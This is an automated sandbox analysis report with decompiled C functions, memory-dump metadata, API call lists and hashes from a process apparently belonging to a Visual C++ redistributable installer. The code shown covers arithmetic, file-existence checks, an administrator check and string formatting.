                                                                          															L51:
                                                                          															_v8 = _t263;
                                                                          															goto L52;
                                                                          														}
                                                                          														_t209 = _v28;
                                                                          														goto L51;
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          											L52:
                                                                          											__eflags = _t209;
                                                                          											if(_t209 != 0) {
                                                                          												L54:
                                                                          												_t280 = _v60;
                                                                          												_t334 = 0;
                                                                          												_t355 = 0;
                                                                          												__eflags = _t280;
                                                                          												if(_t280 != 0) {
                                                                          													_t266 = _v20;
                                                                          													_t219 =  &(_a8[1]);
                                                                          													__eflags = _t219;
                                                                          													_v24 = _t219;
                                                                          													_v16 = _t280;
                                                                          													do {
                                                                          														_v44 =  *_t219;
                                                                          														_t225 =  *_t266;
                                                                          														_t286 = _t334 + _v72 * _v44;
                                                                          														asm("adc esi, edx");
                                                                          														_t334 = _t355;
                                                                          														_t355 = 0;
                                                                          														__eflags = _t225 - _t286;
                                                                          														if(_t225 < _t286) {
                                                                          															_t334 = _t334 + 1;
                                                                          															asm("adc esi, esi");
                                                                          														}
                                                                          														 *_t266 = _t225 - _t286;
                                                                          														_t266 = _t266 + 4;
                                                                          														_t219 = _v24 + 4;
                                                                          														_t164 =  &_v16;
                                                                          														 *_t164 = _v16 - 1;
                                                                          														__eflags =  *_t164;
                                                                          														_v24 = _t219;
                                                                          													} while ( *_t164 != 0);
                                                                          													_t263 = _v8;
                                                                          													_t280 = _v60;
                                                                          												}
                                                                          												__eflags = 0 - _t355;
                                                                          												if(__eflags <= 0) {
                                                                          													if(__eflags < 0) {
                                                                          														L63:
                                                                          														__eflags = _t280;
                                                                          														if(_t280 != 0) {
                                                                          															_t338 = _t280;
                                                                          															_t314 = _v20;
                                                                          															_t362 =  &(_a8[1]);
                                                                          															__eflags = _t362;
                                                                          															_t265 = 0;
                                                                          															do {
                                                                          																_t282 =  *_t314;
                                                                          																_t172 = _t362 + 4; // 0xa6a5959
                                                                          																_t362 = _t172;
                                                                          																_t314 = _t314 + 4;
                                                                          																asm("adc eax, eax");
                                                                          																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
                                                                          																asm("adc eax, 0x0");
                                                                          																_t265 = 0;
                                                                          																_t338 = _t338 - 1;
                                                                          																__eflags = _t338;
                                                                          															} while (_t338 != 0);
                                                                          															_t263 = _v8;
                                                                          														}
                                                                          														_t263 = _t263 + 0xffffffff;
                                                                          														asm("adc dword [ebp-0x18], 0xffffffff");
                                                                          													} else {
                                                                          														__eflags = _v52 - _t334;
                                                                          														if(_v52 < _t334) {
                                                                          															goto L63;
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          												_t213 = _v12 - 1;
                                                                          												__eflags = _t213;
                                                                          												_v16 = _t213;
                                                                          											} else {
                                                                          												__eflags = _t263;
                                                                          												if(_t263 != 0) {
                                                                          													goto L54;
                                                                          												}
                                                                          											}
                                                                          											_t331 = 0 + _t263;
                                                                          											asm("adc esi, 0x0");
                                                                          											_v20 = _v20 - 4;
                                                                          											_t313 = _v32 - 1;
                                                                          											_t262 = _a4;
                                                                          											_t278 = _v80 - 4;
                                                                          											_t206 = _v12 - 1;
                                                                          											_v76 = _t331;
                                                                          											_v32 = _t313;
                                                                          											_v80 = _t278;
                                                                          											_v12 = _t206;
                                                                          											__eflags = _t313;
                                                                          										} while (_t313 >= 0);
                                                                          									}
                                                                          									_t309 = _v16 + 1;
                                                                          									_t204 = _t309;
                                                                          									__eflags = _t204 -  *_t262;
                                                                          									if(_t204 <  *_t262) {
                                                                          										_t191 = _t204 + 1; // 0x4b9cd
                                                                          										_t274 =  &(_t262[_t191]);
                                                                          										do {
                                                                          											 *_t274 = 0;
                                                                          											_t194 =  &(_t274[1]); // 0x91850fc2
                                                                          											_t274 = _t194;
                                                                          											_t204 = _t204 + 1;
                                                                          											__eflags = _t204 -  *_t262;
                                                                          										} while (_t204 <  *_t262);
                                                                          									}
                                                                          									 *_t262 = _t309;
                                                                          									__eflags = _t309;
                                                                          									if(_t309 != 0) {
                                                                          										while(1) {
                                                                          											_t271 =  *_t262;
                                                                          											__eflags = _t262[_t271];
                                                                          											if(_t262[_t271] != 0) {
                                                                          												goto L78;
                                                                          											}
                                                                          											_t272 = _t271 + 0xffffffff;
                                                                          											__eflags = _t272;
                                                                          											 *_t262 = _t272;
                                                                          											if(_t272 != 0) {
                                                                          												continue;
                                                                          											}
                                                                          											goto L78;
                                                                          										}
                                                                          									}
                                                                          									L78:
                                                                          									return _t331;
                                                                          								} else {
                                                                          									goto L23;
                                                                          								}
                                                                          							}
                                                                          						} else {
                                                                          							_t6 =  &(_t328[1]); // 0xfc23b5a
                                                                          							_t295 =  *_t6;
                                                                          							_v44 = _t295;
                                                                          							__eflags = _t295 - 1;
                                                                          							if(_t295 != 1) {
                                                                          								__eflags = _t349;
                                                                          								if(_t349 != 0) {
                                                                          									_t342 = 0;
                                                                          									_v12 = 0;
                                                                          									_v8 = 0;
                                                                          									_v20 = 0;
                                                                          									__eflags = _t349 - 0xffffffff;
                                                                          									if(_t349 != 0xffffffff) {
                                                                          										_t250 = _v16 + 1;
                                                                          										__eflags = _t250;
                                                                          										_v32 = _t250;
                                                                          										_t373 =  &(_t262[_t349 + 1]);
                                                                          										do {
                                                                          											_t253 = E00059BF0( *_t373, _t342, _t295, 0);
                                                                          											_v68 = _t303;
                                                                          											_t373 = _t373 - 4;
                                                                          											_v20 = _t262;
                                                                          											_t342 = _t295;
                                                                          											_t303 = 0 + _t253;
                                                                          											asm("adc ecx, 0x0");
                                                                          											_v12 = _t303;
                                                                          											_t34 =  &_v32;
                                                                          											 *_t34 = _v32 - 1;
                                                                          											__eflags =  *_t34;
                                                                          											_v8 = _v12;
                                                                          											_t295 = _v44;
                                                                          										} while ( *_t34 != 0);
                                                                          										_t262 = _a4;
                                                                          									}
                                                                          									_v544 = 0;
                                                                          									_t41 =  &(_t262[1]); // 0x4
                                                                          									_t370 = _t41;
                                                                          									 *_t262 = 0;
                                                                          									E0004BBFA(_t370, 0x1cc,  &_v540, 0);
                                                                          									_t247 = _v20;
                                                                          									__eflags = 0 - _t247;
                                                                          									 *_t370 = _t342;
                                                                          									_t262[2] = _t247;
                                                                          									asm("sbb ecx, ecx");
                                                                          									__eflags =  ~0x00000000;
                                                                          									 *_t262 = 0xbadbae;
                                                                          									return _v12;
                                                                          								} else {
                                                                          									_t14 =  &(_t262[1]); // 0x4
                                                                          									_t344 = _t14;
                                                                          									_v544 = 0;
                                                                          									 *_t262 = 0;
                                                                          									E0004BBFA(_t344, 0x1cc,  &_v540, 0);
                                                                          									_t256 = _t262[1];
                                                                          									_t322 = _t256 % _v44;
                                                                          									__eflags = 0 - _t322;
                                                                          									 *_t344 = _t322;
                                                                          									asm("sbb ecx, ecx");
                                                                          									__eflags = 0;
                                                                          									 *_t262 =  ~0x00000000;
                                                                          									return _t256 / _v44;
                                                                          								}
                                                                          							} else {
                                                                          								_t9 =  &(_t262[1]); // 0x4
                                                                          								_v544 = _t198;
                                                                          								 *_t262 = _t198;
                                                                          								E0004BBFA(_t9, 0x1cc,  &_v540, _t198);
                                                                          								__eflags = 0;
                                                                          								return _t262[1];
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						__eflags = 0;
                                                                          						return 0;
                                                                          					}
                                                                          				} else {
                                                                          					return _t197;
                                                                          				}
                                                                          			}
                                                                          0x0004a79a
                                                                          0x0004a79f
                                                                          0x0004a7a1
                                                                          0x0004a7a4
                                                                          0x0004a7a4
                                                                          0x0004a7a7
                                                                          0x0004a7b0
                                                                          0x0004a7b0
                                                                          0x0004a7b2
                                                                          0x0004a7b2
                                                                          0x0004a7b7
                                                                          0x0004a7bd
                                                                          0x0004a7c1
                                                                          0x0004a7c4
                                                                          0x0004a7c7
                                                                          0x0004a7c9
                                                                          0x0004a7c9
                                                                          0x0004a7c9
                                                                          0x0004a7ce
                                                                          0x0004a7ce
                                                                          0x0004a7d1
                                                                          0x0004a7d4
                                                                          0x0004a793
                                                                          0x0004a793
                                                                          0x0004a796
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a796
                                                                          0x0004a791
                                                                          0x0004a7db
                                                                          0x0004a7db
                                                                          0x0004a7dc
                                                                          0x0004a723
                                                                          0x0004a723
                                                                          0x0004a725
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a725
                                                                          0x0004a7ec
                                                                          0x0004a7f1
                                                                          0x0004a7f4
                                                                          0x0004a7f8
                                                                          0x0004a7f9
                                                                          0x0004a7fc
                                                                          0x0004a7ff
                                                                          0x0004a800
                                                                          0x0004a803
                                                                          0x0004a806
                                                                          0x0004a809
                                                                          0x0004a80c
                                                                          0x0004a80c
                                                                          0x0004a814
                                                                          0x0004a81b
                                                                          0x0004a81c
                                                                          0x0004a81e
                                                                          0x0004a820
                                                                          0x0004a822
                                                                          0x0004a825
                                                                          0x0004a830
                                                                          0x0004a830
                                                                          0x0004a836
                                                                          0x0004a836
                                                                          0x0004a839
                                                                          0x0004a83a
                                                                          0x0004a83a
                                                                          0x0004a830
                                                                          0x0004a83e
                                                                          0x0004a840
                                                                          0x0004a842
                                                                          0x0004a844
                                                                          0x0004a844
                                                                          0x0004a846
                                                                          0x0004a84a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a84c
                                                                          0x0004a84c
                                                                          0x0004a84f
                                                                          0x0004a851
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a851
                                                                          0x0004a844
                                                                          0x0004a853
                                                                          0x0004a85d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0004a568
                                                                          0x0004a3f2
                                                                          0x0004a3f2
                                                                          0x0004a3f2
                                                                          0x0004a3f5
                                                                          0x0004a3f8
                                                                          0x0004a3fb
                                                                          0x0004a42c
                                                                          0x0004a42e
                                                                          0x0004a479
                                                                          0x0004a47b
                                                                          0x0004a482
                                                                          0x0004a489
                                                                          0x0004a48c
                                                                          0x0004a48f
                                                                          0x0004a495
                                                                          0x0004a495
                                                                          0x0004a496
                                                                          0x0004a499
                                                                          0x0004a4a0
                                                                          0x0004a4a9
                                                                          0x0004a4ae
                                                                          0x0004a4b1
                                                                          0x0004a4b6
                                                                          0x0004a4b9
                                                                          0x0004a4bb
                                                                          0x0004a4c0
                                                                          0x0004a4c3
                                                                          0x0004a4c6
                                                                          0x0004a4c6
                                                                          0x0004a4c6
                                                                          0x0004a4ca
                                                                          0x0004a4cd
                                                                          0x0004a4cd
                                                                          0x0004a4d2
                                                                          0x0004a4d2
                                                                          0x0004a4dd
                                                                          0x0004a4e8
                                                                          0x0004a4e8
                                                                          0x0004a4eb
                                                                          0x0004a4f7
                                                                          0x0004a4fc
                                                                          0x0004a507
                                                                          0x0004a509
                                                                          0x0004a50b
                                                                          0x0004a511
                                                                          0x0004a516
                                                                          0x0004a518
                                                                          0x0004a51e
                                                                          0x0004a430
                                                                          0x0004a43c
                                                                          0x0004a43c
                                                                          0x0004a43f
                                                                          0x0004a44f
                                                                          0x0004a455
                                                                          0x0004a45c
                                                                          0x0004a45e
                                                                          0x0004a466
                                                                          0x0004a468
                                                                          0x0004a46a
                                                                          0x0004a46f
                                                                          0x0004a472
                                                                          0x0004a478
                                                                          0x0004a478
                                                                          0x0004a3fd
                                                                          0x0004a400
                                                                          0x0004a404
                                                                          0x0004a40a
                                                                          0x0004a419
                                                                          0x0004a423
                                                                          0x0004a42b
                                                                          0x0004a42b
                                                                          0x0004a3fb
                                                                          0x0004a3d6
                                                                          0x0004a3d9
                                                                          0x0004a3df
                                                                          0x0004a3df
                                                                          0x0004a3c5
                                                                          0x0004a3cb
                                                                          0x0004a3cb

                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eb5ef6380223df80c09fbffff4406c54564286920eb9de1bd108dda9bf4439f2
                                                                          • Instruction ID: 90021db77806623d92bf5d44a92003072cfe45c7b7ca63ddf17f4b617c11dd5e
                                                                          • Opcode Fuzzy Hash: eb5ef6380223df80c09fbffff4406c54564286920eb9de1bd108dda9bf4439f2
                                                                          • Instruction Fuzzy Hash: ED024DB1E402199FDF24CFA9C9806ADB7F1EF89314F258169D819E7380D731AE41CB85
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 55%
                                                                          			E0005393B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, int* _a4) {
                                                                          				signed int _v8;
                                                                          				short _v12;
                                                                          				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                          				void* _v20;
                                                                          				char _v24;
                                                                          				void* __ebp;
                                                                          				signed int _t15;
                                                                          				int _t21;
                                                                          				void* _t27;
                                                                          				void* _t31;
                                                                          				void* _t32;
                                                                          				int* _t34;
                                                                          				void* _t35;
                                                                          				signed int _t36;
                                                                          
                                                                          				_t32 = __edi;
                                                                          				_t31 = __edx;
                                                                          				_t15 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t15 ^ _t36;
                                                                          				_push(__ebx);
                                                                          				_push(__esi);
                                                                          				_t34 = _a4;
                                                                          				_v12 = 0x500;
                                                                          				_v24 = 0;
                                                                          				_v16.Value = 0;
                                                                          				_v20 = 0;
                                                                          				E00053AC9(__ecx,  &_v24);
                                                                          				if(_v24 == 0) {
                                                                          					_t21 = AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v20);
                                                                          					 *_t34 = _t21;
                                                                          					if(_t21 != 0) {
                                                                          						__imp__CheckTokenMembership(0, _v20, _t34);
                                                                          						if(_t21 == 0) {
                                                                          							 *_t34 = 0;
                                                                          						}
                                                                          					}
                                                                          				} else {
                                                                          					 *_t34 = 1;
                                                                          				}
                                                                          				_pop(_t35);
                                                                          				_pop(_t27);
                                                                          				if(_v20 != 0) {
                                                                          					E000554EF(_v20);
                                                                          				}
                                                                          				return E0003DE36(_t27, _v8 ^ _t36, _t31, _t32, _t35);
                                                                          			}


















                                                                          APIs
                                                                            • Part of subcall function 00053AC9: RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,0005396A,?), ref: 00053B3A
                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0005398E
                                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0005399F
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateCheckCloseInitializeMembershipToken
                                                                          • String ID:
                                                                          • API String ID: 2114926846-0
                                                                          • Opcode ID: 5d34a06a34b173e3a232f4c067080c218476c8aa80c2081421899c7f7b3feb88
                                                                          • Instruction ID: 3833a4ee62a53a027ec9d9c834a2482db7ec4ca43c8c15fab330033754d0d96d
                                                                          • Opcode Fuzzy Hash: 5d34a06a34b173e3a232f4c067080c218476c8aa80c2081421899c7f7b3feb88
                                                                          • Instruction Fuzzy Hash: 1B111EB190031AAFDB20DFA5DC85ABFBBF8FF08346F50482DA945A6181D7749A48CB51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00054315(WCHAR* _a4, signed char* _a8) {
                                                                          				signed int _v8;
                                                                          				struct _WIN32_FIND_DATAW _v600;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t10;
                                                                          				void* _t15;
                                                                          				signed char _t19;
                                                                          				signed char* _t20;
                                                                          				void* _t23;
                                                                          				void* _t24;
                                                                          				signed int _t27;
                                                                          
                                                                          				_t10 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t10 ^ _t27;
                                                                          				_t20 = _a8;
                                                                          				_t26 = _a4;
                                                                          				_t24 = 0;
                                                                          				E0003F670(0,  &_v600, 0, 0x250);
                                                                          				_t15 = FindFirstFileW(_a4,  &_v600);
                                                                          				if(_t15 != 0xffffffff) {
                                                                          					FindClose(_t15);
                                                                          					_t19 = _v600.dwFileAttributes;
                                                                          					if((_t19 & 0x00000010) == 0) {
                                                                          						if(_t20 != 0) {
                                                                          							 *_t20 = _t19;
                                                                          						}
                                                                          						_t24 = 1;
                                                                          					}
                                                                          				}
                                                                          				return E0003DE36(_t20, _v8 ^ _t27, _t23, _t24, _t26);
                                                                          			}

















                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(00038FFA,?,000002C0,00000000,00000000), ref: 00054350
                                                                          • FindClose.KERNEL32(00000000), ref: 0005435C
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: 0bdc4b63181193a7d0c8f047a4fe6d34f22109008b79e33a9071ad3f9f7beac0
                                                                          • Instruction ID: 82e847b47ee9009ac67c401b7f57f497bd4d4ffba8ec399660a046c712d2df20
                                                                          • Opcode Fuzzy Hash: 0bdc4b63181193a7d0c8f047a4fe6d34f22109008b79e33a9071ad3f9f7beac0
                                                                          • Instruction Fuzzy Hash: D801DB71A0060867DB10EF659D499ABB7ACEBC5316F400155E908D3150D7345E8D8794
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 88%
                                                                          			E00042B21(void* __ecx) {
                                                                          				char _v6;
                                                                          				char _v8;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				char _t49;
                                                                          				signed int _t50;
                                                                          				void* _t51;
                                                                          				signed char _t54;
                                                                          				signed char _t56;
                                                                          				signed int _t57;
                                                                          				signed int _t58;
                                                                          				signed char _t67;
                                                                          				signed char _t69;
                                                                          				signed char _t71;
                                                                          				signed char _t80;
                                                                          				signed char _t82;
                                                                          				signed int _t84;
                                                                          				signed int _t86;
                                                                          				signed int _t87;
                                                                          				signed char _t92;
                                                                          				void* _t95;
                                                                          				intOrPtr _t100;
                                                                          				unsigned int _t102;
                                                                          				signed char _t104;
                                                                          				void* _t112;
                                                                          				unsigned int _t113;
                                                                          				void* _t114;
                                                                          				signed int _t115;
                                                                          				signed int* _t116;
                                                                          				void* _t119;
                                                                          				void* _t121;
                                                                          				void* _t122;
                                                                          				void* _t124;
                                                                          				void* _t125;
                                                                          
                                                                          				_push(__ecx);
                                                                          				_t119 = __ecx;
                                                                          				_t92 = 1;
                                                                          				_t49 =  *((char*)(__ecx + 0x31));
                                                                          				_t124 = _t49 - 0x64;
                                                                          				if(_t124 > 0) {
                                                                          					__eflags = _t49 - 0x70;
                                                                          					if(__eflags > 0) {
                                                                          						_t50 = _t49 - 0x73;
                                                                          						__eflags = _t50;
                                                                          						if(_t50 == 0) {
                                                                          							L9:
                                                                          							_t51 = E0004370F(_t119);
                                                                          							L10:
                                                                          							if(_t51 != 0) {
                                                                          								__eflags =  *((char*)(_t119 + 0x30));
                                                                          								if( *((char*)(_t119 + 0x30)) == 0) {
                                                                          									_t113 =  *(_t119 + 0x20);
                                                                          									_push(_t114);
                                                                          									_v8 = 0;
                                                                          									_t115 = 0;
                                                                          									_v6 = 0;
                                                                          									_t54 = _t113 >> 4;
                                                                          									__eflags = _t92 & _t54;
                                                                          									if((_t92 & _t54) == 0) {
                                                                          										L46:
                                                                          										_t100 =  *((intOrPtr*)(_t119 + 0x31));
                                                                          										__eflags = _t100 - 0x78;
                                                                          										if(_t100 == 0x78) {
                                                                          											L48:
                                                                          											_t56 = _t113 >> 5;
                                                                          											__eflags = _t92 & _t56;
                                                                          											if((_t92 & _t56) != 0) {
                                                                          												L50:
                                                                          												__eflags = _t100 - 0x61;
                                                                          												if(_t100 == 0x61) {
                                                                          													L53:
                                                                          													_t57 = 1;
                                                                          													L54:
                                                                          													__eflags = _t92;
                                                                          													if(_t92 != 0) {
                                                                          														L56:
                                                                          														 *((char*)(_t121 + _t115 - 4)) = 0x30;
                                                                          														__eflags = _t100 - 0x58;
                                                                          														if(_t100 == 0x58) {
                                                                          															L59:
                                                                          															_t58 = 1;
                                                                          															L60:
                                                                          															__eflags = _t58;
                                                                          															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
                                                                          															_t115 = _t115 + 2;
                                                                          															__eflags = _t115;
                                                                          															L61:
                                                                          															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
                                                                          															__eflags = _t113 & 0x0000000c;
                                                                          															if((_t113 & 0x0000000c) == 0) {
                                                                          																E0004206E(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
                                                                          																_t122 = _t122 + 0x10;
                                                                          															}
                                                                          															E00043A0A(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
                                                                          															_t102 =  *(_t119 + 0x20);
                                                                          															_t116 = _t119 + 0x18;
                                                                          															_t67 = _t102 >> 3;
                                                                          															__eflags = _t67 & 0x00000001;
                                                                          															if((_t67 & 0x00000001) != 0) {
                                                                          																_t104 = _t102 >> 2;
                                                                          																__eflags = _t104 & 0x00000001;
                                                                          																if((_t104 & 0x00000001) == 0) {
                                                                          																	E0004206E(_t119 + 0x448, 0x30, _t95, _t116);
                                                                          																	_t122 = _t122 + 0x10;
                                                                          																}
                                                                          															}
                                                                          															E000438D8(_t119, _t113, 0);
                                                                          															__eflags =  *_t116;
                                                                          															if( *_t116 >= 0) {
                                                                          																_t71 =  *(_t119 + 0x20) >> 2;
                                                                          																__eflags = _t71 & 0x00000001;
                                                                          																if((_t71 & 0x00000001) != 0) {
                                                                          																	E0004206E(_t119 + 0x448, 0x20, _t95, _t116);
                                                                          																}
                                                                          															}
                                                                          															_t69 = 1;
                                                                          															L70:
                                                                          															return _t69;
                                                                          														}
                                                                          														__eflags = _t100 - 0x41;
                                                                          														if(_t100 == 0x41) {
                                                                          															goto L59;
                                                                          														}
                                                                          														_t58 = 0;
                                                                          														goto L60;
                                                                          													}
                                                                          													__eflags = _t57;
                                                                          													if(_t57 == 0) {
                                                                          														goto L61;
                                                                          													}
                                                                          													goto L56;
                                                                          												}
                                                                          												__eflags = _t100 - 0x41;
                                                                          												if(_t100 == 0x41) {
                                                                          													goto L53;
                                                                          												}
                                                                          												_t57 = 0;
                                                                          												goto L54;
                                                                          											}
                                                                          											L49:
                                                                          											_t92 = 0;
                                                                          											__eflags = 0;
                                                                          											goto L50;
                                                                          										}
                                                                          										__eflags = _t100 - 0x58;
                                                                          										if(_t100 != 0x58) {
                                                                          											goto L49;
                                                                          										}
                                                                          										goto L48;
                                                                          									}
                                                                          									_t80 = _t113 >> 6;
                                                                          									__eflags = _t92 & _t80;
                                                                          									if((_t92 & _t80) == 0) {
                                                                          										__eflags = _t92 & _t113;
                                                                          										if((_t92 & _t113) == 0) {
                                                                          											_t82 = _t113 >> 1;
                                                                          											__eflags = _t92 & _t82;
                                                                          											if((_t92 & _t82) == 0) {
                                                                          												goto L46;
                                                                          											}
                                                                          											_v8 = 0x20;
                                                                          											L45:
                                                                          											_t115 = _t92;
                                                                          											goto L46;
                                                                          										}
                                                                          										_v8 = 0x2b;
                                                                          										goto L45;
                                                                          									}
                                                                          									_v8 = 0x2d;
                                                                          									goto L45;
                                                                          								}
                                                                          								_t69 = _t92;
                                                                          								goto L70;
                                                                          							}
                                                                          							L11:
                                                                          							_t69 = 0;
                                                                          							goto L70;
                                                                          						}
                                                                          						_t84 = _t50;
                                                                          						__eflags = _t84;
                                                                          						if(__eflags == 0) {
                                                                          							L28:
                                                                          							_push(0);
                                                                          							_push(0xa);
                                                                          							L29:
                                                                          							_t51 = E0004351A(_t119, _t114, __eflags);
                                                                          							goto L10;
                                                                          						}
                                                                          						__eflags = _t84 - 3;
                                                                          						if(__eflags != 0) {
                                                                          							goto L11;
                                                                          						}
                                                                          						_push(0);
                                                                          						L13:
                                                                          						_push(0x10);
                                                                          						goto L29;
                                                                          					}
                                                                          					if(__eflags == 0) {
                                                                          						_t51 = E000436F7(__ecx);
                                                                          						goto L10;
                                                                          					}
                                                                          					__eflags = _t49 - 0x67;
                                                                          					if(_t49 <= 0x67) {
                                                                          						L30:
                                                                          						_t51 = E00043126(_t92, _t119, _t112);
                                                                          						goto L10;
                                                                          					}
                                                                          					__eflags = _t49 - 0x69;
                                                                          					if(_t49 == 0x69) {
                                                                          						L27:
                                                                          						_t2 = _t119 + 0x20;
                                                                          						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
                                                                          						__eflags =  *_t2;
                                                                          						goto L28;
                                                                          					}
                                                                          					__eflags = _t49 - 0x6e;
                                                                          					if(_t49 == 0x6e) {
                                                                          						_t51 = E00043664(__ecx, _t112);
                                                                          						goto L10;
                                                                          					}
                                                                          					__eflags = _t49 - 0x6f;
                                                                          					if(_t49 != 0x6f) {
                                                                          						goto L11;
                                                                          					}
                                                                          					_t51 = E000436D8(__ecx);
                                                                          					goto L10;
                                                                          				}
                                                                          				if(_t124 == 0) {
                                                                          					goto L27;
                                                                          				}
                                                                          				_t125 = _t49 - 0x58;
                                                                          				if(_t125 > 0) {
                                                                          					_t86 = _t49 - 0x5a;
                                                                          					__eflags = _t86;
                                                                          					if(_t86 == 0) {
                                                                          						_t51 = E00043060(__ecx);
                                                                          						goto L10;
                                                                          					}
                                                                          					_t87 = _t86 - 7;
                                                                          					__eflags = _t87;
                                                                          					if(_t87 == 0) {
                                                                          						goto L30;
                                                                          					}
                                                                          					__eflags = _t87;
                                                                          					if(__eflags != 0) {
                                                                          						goto L11;
                                                                          					}
                                                                          					L17:
                                                                          					_t51 = E000433F2(_t92, _t119, __eflags, 0);
                                                                          					goto L10;
                                                                          				}
                                                                          				if(_t125 == 0) {
                                                                          					_push(1);
                                                                          					goto L13;
                                                                          				}
                                                                          				if(_t49 == 0x41) {
                                                                          					goto L30;
                                                                          				}
                                                                          				if(_t49 == 0x43) {
                                                                          					goto L17;
                                                                          				}
                                                                          				if(_t49 <= 0x44) {
                                                                          					goto L11;
                                                                          				}
                                                                          				if(_t49 <= 0x47) {
                                                                          					goto L30;
                                                                          				}
                                                                          				if(_t49 != 0x53) {
                                                                          					goto L11;
                                                                          				}
                                                                          				goto L9;
                                                                          			}






































                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 0$comres.dll
                                                                          • API String ID: 0-3030269839
                                                                          • Opcode ID: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
                                                                          • Instruction ID: 10e2b5488e5c6d298700580e1e0bc9d85204fb2f79d8ff5d27c3a23c5d7bdf7f
                                                                          • Opcode Fuzzy Hash: f7a880ec5967ec64a90054ca813bf1243ddeae79b496adee3d9f08ad155e7dd2
                                                                          • Instruction Fuzzy Hash: 105164E070464557DBB89E284896BFE23C9EB52340FD8053AF882DB283D711EE41C39E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
